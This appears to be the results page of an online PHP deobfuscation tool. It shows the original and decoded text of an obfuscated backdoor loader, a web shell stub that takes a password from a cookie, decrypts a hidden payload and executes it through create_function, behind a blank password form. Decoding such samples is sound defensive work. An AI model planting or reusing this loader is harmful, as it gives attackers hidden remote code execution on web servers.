Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$G="_COOKIE"; if(!empty(${$G}["key"])){$G=${$G}["key"]; $O=strlen($G); $w=array(); ..

Decoded Output download

<?   
$G="_COOKIE"; 
if(!empty(${$G}["key"])){$G=${$G}["key"]; 
$O=strlen($G); 
$w=array(); 
 
 
for($j=0; 
$j<$O; 
++$j)$w[]=44358-$O-ord($G[$j]); 
$G="base64_decode"; 
$e=$G(str_replace("
",'',$e)); 
 
for($j=0; 
$j<44358; 
++$j){$y=abs($w[$j%$O]-$j); 
$G=$e[$y]; 
$e[$y]=$e[$j]; 
$e[$j]=$G; 
}if($O<10)$O*=$O&1?3:2; 
 
 
if(($e=@gzinflate($e))&&(md5(substr($e,0,$O))==='beaa04ce32b5f5333706e24514eeaa8a')){$e=substr($e,$O); 
if(php_version<'5'){ 
$G=array(66154,5551,27524,206,25706,204,24791,706,19615,204,19307,204,18767,131,18248,182,17917,182,17597,179,17189,179,16781,179,16374,179,15967,179,15559,178,15082,187,14724,178,14220,177,5061,181,4131,211); 
 
for($j=0; 
$j<40; 
++$j)$e=substr_replace($e,"",$G[$j],$G[++$j]); 
}@create_function('',"}; 
unset(\$e,\$w,\$O,\$j,\$y,\$G); 
".$e.'{'); 
}} 
 
 
DIE("<!DOCTYPE html><html><head><link rel=\"icon\"href=\"data:; 
base64,iVBORw0KGgo=\"></head><body> 
<form method=\"post\"onsubmit=\"document.cookie='key='+encodeURIComponent(this[0].value)\"><input type=\"text\"/></form></body></html>"); 
?>

Did this file decode correctly?

Original Code


$G="_COOKIE";
if(!empty(${$G}["key"])){$G=${$G}["key"];
$O=strlen($G);
$w=array();


for($j=0;
$j<$O;
++$j)$w[]=44358-$O-ord($G[$j]);
$G="base64_decode";
$e=$G(str_replace("\n",'',$e));

for($j=0;
$j<44358;
++$j){$y=abs($w[$j%$O]-$j);
$G=$e[$y];
$e[$y]=$e[$j];
$e[$j]=$G;
}if($O<10)$O*=$O&1?3:2;


if(($e=@gzinflate($e))&&(md5(substr($e,0,$O))==='beaa04ce32b5f5333706e24514eeaa8a')){$e=substr($e,$O);
if(php_version<'5'){
$G=array(66154,5551,27524,206,25706,204,24791,706,19615,204,19307,204,18767,131,18248,182,17917,182,17597,179,17189,179,16781,179,16374,179,15967,179,15559,178,15082,187,14724,178,14220,177,5061,181,4131,211);

for($j=0;
$j<40;
++$j)$e=substr_replace($e,"",$G[$j],$G[++$j]);
}@create_function('',"};
unset(\$e,\$w,\$O,\$j,\$y,\$G);
".$e.'{');
}}


DIE("<!DOCTYPE html><html><head><link rel=\"ic\x6fn\"href=\"data:;
base64,iVBORw0KGgo=\"></head><body>
<form method=\"post\"onsubmit=\"document.c\x6f\x6f\x6b\x69\x65='key='+encodeURIComponent(this[0].value)\"><input type=\"text\"/></form></body></html>");
?>

Function Calls

None

Variables

$G _COOKIE

Stats

MD5 3db39758b25328691463cfd12bda4ea8
Eval Count 0
Decode Time 275 ms